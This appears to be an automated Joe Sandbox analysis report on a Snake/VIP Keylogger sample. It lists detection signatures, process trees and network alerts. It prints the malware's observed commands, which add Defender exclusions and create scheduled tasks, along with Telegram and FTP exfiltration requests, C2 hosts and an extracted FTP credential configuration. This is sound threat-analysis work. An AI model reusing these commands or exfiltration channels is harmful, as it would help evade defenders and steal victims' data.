Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3140, EUR.exe

Overview

General Information

Sample name:3140, EUR.exe
Analysis ID:1522669
MD5:332593ae1e0ba5a06370963c37bbbceb
SHA1:994f8e733ba1961882dcdef0c78fc305db4c1c91
SHA256:9ca5a71321522f47140b36e5f1983cff7455dd124caa231d97df29cd654c6893
Tags:exeSnakeKeyloggeruser-lowmal3
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Connects to many ports of the same IP (likely port scanning)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 3140, EUR.exe (PID: 6844 cmdline: "C:\Users\user\Desktop\3140, EUR.exe" MD5: 332593AE1E0BA5A06370963C37BBBCEB)
    • powershell.exe (PID: 2124 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7320 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 3120 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6692 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmpE737.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 3140, EUR.exe (PID: 7180 cmdline: "C:\Users\user\Desktop\3140, EUR.exe" MD5: 332593AE1E0BA5A06370963C37BBBCEB)
  • lkuPOyvaWlIu.exe (PID: 7276 cmdline: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe MD5: 332593AE1E0BA5A06370963C37BBBCEB)
    • schtasks.exe (PID: 7472 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmp4A2.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • lkuPOyvaWlIu.exe (PID: 7516 cmdline: "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe" MD5: 332593AE1E0BA5A06370963C37BBBCEB)
    • lkuPOyvaWlIu.exe (PID: 7544 cmdline: "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe" MD5: 332593AE1E0BA5A06370963C37BBBCEB)
    • lkuPOyvaWlIu.exe (PID: 7552 cmdline: "C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe" MD5: 332593AE1E0BA5A06370963C37BBBCEB)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "FTP", "Username": "humble@quicklyserv.com", "Password": "omobolajijonze12345", "FTP Server": "ftp://quicklyserv.com/"}
SourceRuleDescriptionAuthorStrings
00000008.00000002.4122819893.000000000318E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
    00000008.00000002.4122819893.0000000003011000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000008.00000002.4122819893.0000000003117000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000008.00000002.4119574462.000000000043E000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000000F.00000002.4122549015.000000000337F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
            Click to see the 31 entries
            SourceRuleDescriptionAuthorStrings
            8.2.3140, EUR.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.3140, EUR.exe.4397fe0.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.3140, EUR.exe.4397fe0.1.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                  0.2.3140, EUR.exe.4397fe0.1.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    0.2.3140, EUR.exe.4397fe0.1.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                    • 0x2c1dd:$a1: get_encryptedPassword
                    • 0x2c4fa:$a2: get_encryptedUsername
                    • 0x2bfed:$a3: get_timePasswordChanged
                    • 0x2c0f6:$a4: get_passwordField
                    • 0x2c1f3:$a5: set_encryptedPassword
                    • 0x2d8b0:$a7: get_logins
                    • 0x2d813:$a10: KeyLoggerEventArgs
                    • 0x2d478:$a11: KeyLoggerEventArgsEventHandler
                    Click to see the 47 entries

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\3140, EUR.exe", ParentImage: C:\Users\user\Desktop\3140, EUR.exe, ParentProcessId: 6844, ParentProcessName: 3140, EUR.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe", ProcessId: 2124, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\3140, EUR.exe", ParentImage: C:\Users\user\Desktop\3140, EUR.exe, ParentProcessId: 6844, ParentProcessName: 3140, EUR.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe", ProcessId: 2124, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmp4A2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmp4A2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe, ParentImage: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe, ParentProcessId: 7276, ParentProcessName: lkuPOyvaWlIu.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmp4A2.tmp", ProcessId: 7472, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmpE737.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmpE737.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\3140, EUR.exe", ParentImage: C:\Users\user\Desktop\3140, EUR.exe, ParentProcessId: 6844, ParentProcessName: 3140, EUR.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmpE737.tmp", ProcessId: 6692, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\3140, EUR.exe", ParentImage: C:\Users\user\Desktop\3140, EUR.exe, ParentProcessId: 6844, ParentProcessName: 3140, EUR.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\3140, EUR.exe", ProcessId: 2124, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmpE737.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmpE737.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\3140, EUR.exe", ParentImage: C:\Users\user\Desktop\3140, EUR.exe, ParentProcessId: 6844, ParentProcessName: 3140, EUR.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lkuPOyvaWlIu" /XML "C:\Users\user\AppData\Local\Temp\tmpE737.tmp", ProcessId: 6692, ProcessName: schtasks.exe
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-30T15:03:08.573740+020028033053Unknown Traffic192.168.2.449737188.114.97.3443TCP
                    2024-09-30T15:03:11.053405+020028033053Unknown Traffic192.168.2.449739188.114.97.3443TCP
                    2024-09-30T15:03:12.914997+020028033053Unknown Traffic192.168.2.449742188.114.97.3443TCP
                    2024-09-30T15:03:14.482581+020028033053Unknown Traffic192.168.2.449745188.114.97.3443TCP
                    2024-09-30T15:03:17.150964+020028033053Unknown Traffic192.168.2.449752188.114.97.3443TCP
                    2024-09-30T15:03:17.408082+020028033053Unknown Traffic192.168.2.449753188.114.97.3443TCP
                    2024-09-30T15:03:25.987378+020028033053Unknown Traffic192.168.2.449763188.114.97.3443TCP
                    2024-09-30T15:03:28.112386+020028033053Unknown Traffic192.168.2.449765188.114.97.3443TCP
                    2024-09-30T15:03:28.824855+020028033053Unknown Traffic192.168.2.449766188.114.97.3443TCP
                    2024-09-30T15:03:38.813708+020028033053Unknown Traffic192.168.2.449774188.114.97.3443TCP
                    2024-09-30T15:03:40.638151+020028033053Unknown Traffic192.168.2.449776188.114.97.3443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-30T15:03:06.041175+020028032742Potentially Bad Traffic192.168.2.449734132.226.8.16980TCP
                    2024-09-30T15:03:08.055931+020028032742Potentially Bad Traffic192.168.2.449734132.226.8.16980TCP
                    2024-09-30T15:03:10.479342+020028032742Potentially Bad Traffic192.168.2.449738132.226.8.16980TCP
                    2024-09-30T15:03:13.352929+020028032742Potentially Bad Traffic192.168.2.449741132.226.8.16980TCP
                    2024-09-30T15:03:16.259049+020028032742Potentially Bad Traffic192.168.2.449741132.226.8.16980TCP
                    2024-09-30T15:03:20.196573+020028032742Potentially Bad Traffic192.168.2.449755132.226.8.16980TCP
                    2024-09-30T15:03:24.274728+020028032742Potentially Bad Traffic192.168.2.449759132.226.8.16980TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-30T15:03:01.894291+020028455321Malware Command and Control Activity Detected192.168.2.44978045.143.99.5221TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: http://aborters.duckdns.org:8081URL Reputation: Label: malware
                    Source: http://anotherarmy.dns.army:8081URL Reputation: Label: malware
                    Source: 0.2.3140, EUR.exe.4397fe0.1.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "FTP", "Username": "humble@quicklyserv.com", "Password": "omobolajijonze12345", "FTP Server": "ftp://quicklyserv.com/"}
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeReversingLabs: Detection: 47%
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeVirustotal: Detection: 43%Perma Link
                    Source: 3140, EUR.exeReversingLabs: Detection: 47%
                    Source: 3140, EUR.exeVirustotal: Detection: 43%Perma Link
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeJoe Sandbox ML: detected
                    Source: 3140, EUR.exeJoe Sandbox ML: detected

                    Location Tracking

                    barindex
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: 3140, EUR.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49744 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49768 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49777 version: TLS 1.2
                    Source: 3140, EUR.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: OqNV.pdb source: 3140, EUR.exe, lkuPOyvaWlIu.exe.0.dr
                    Source: Binary string: OqNV.pdbSHA256/{ source: 3140, EUR.exe, lkuPOyvaWlIu.exe.0.dr
                    Source: Binary string: OqNV.pdb|D source: 3140, EUR.exe, 00000000.00000002.1740034846.000000000741E000.00000004.00000020.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 4x nop then jmp 02E1F475h8_2_02E1F2D8
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 4x nop then jmp 02E1F475h8_2_02E1F4C4
                    Source: C:\Users\user\Desktop\3140, EUR.exeCode function: 4x nop then jmp 02E1FC31h8_2_02E1F979
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 4x nop then jmp 056EF475h15_2_056EF4C4
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 4x nop then jmp 056EF475h15_2_056EF2D8
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 4x nop then jmp 056EFC31h15_2_056EF979
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 4x nop then jmp 06F20D0Dh15_2_06F20B30
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 4x nop then jmp 06F21697h15_2_06F20B30
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 4x nop then jmp 06F231E0h15_2_06F22DC8
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 4x nop then jmp 06F22C19h15_2_06F22968
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 4x nop then jmp 06F2E959h15_2_06F2E6B0
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h15_2_06F20673
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 4x nop then jmp 06F2E501h15_2_06F2E258
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 4x nop then jmp 06F2E0A9h15_2_06F2DE00
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 4x nop then jmp 06F2F661h15_2_06F2F3B8
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 4x nop then jmp 06F2F209h15_2_06F2EF60
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 4x nop then jmp 06F2EDB1h15_2_06F2EB08
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 4x nop then jmp 06F2D3A1h15_2_06F2D0F8
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 4x nop then jmp 06F2CF49h15_2_06F2CCA0
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h15_2_06F20853
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h15_2_06F20040
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 4x nop then jmp 06F2FAB9h15_2_06F2F810
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 4x nop then jmp 06F231E0h15_2_06F22DB8
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 4x nop then jmp 06F2DC51h15_2_06F2D9A8
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 4x nop then jmp 06F2D7F9h15_2_06F2D550
                    Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exeCode function: 4x nop then jmp 06F231E0h15_2_06F2310E

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2845532 - Severity 1 - ETPRO MALWARE SnakeKeylogger Exfil via FTP M1 : 192.168.2.4:49780 -> 45.143.99.52:21
                    Source: global trafficTCP traffic: 45.143.99.52 ports 52160,54464,1,2,53879,21
                    Source: unknownDNS query: name: api.telegram.org
                    Source: Yara matchFile source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.4:49779 -> 45.143.99.52:53879
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2001/10/2024%20/%2010:09:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724536%0D%0ADate%20and%20Time:%2001/10/2024%20/%2015:48:32%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724536%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewIP Address: 45.143.99.52 45.143.99.52
                    Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                    Source: Joe Sandbox ViewASN Name: EKSENBILISIMTR EKSENBILISIMTR
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49755 -> 132.226.8.169:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 132.226.8.169:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49734 -> 132.226.8.169:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49759 -> 132.226.8.169:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49741 -> 132.226.8.169:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49765 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49776 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49742 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49753 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49739 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49766 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49752 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49774 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49763 -> 188.114.97.3:443
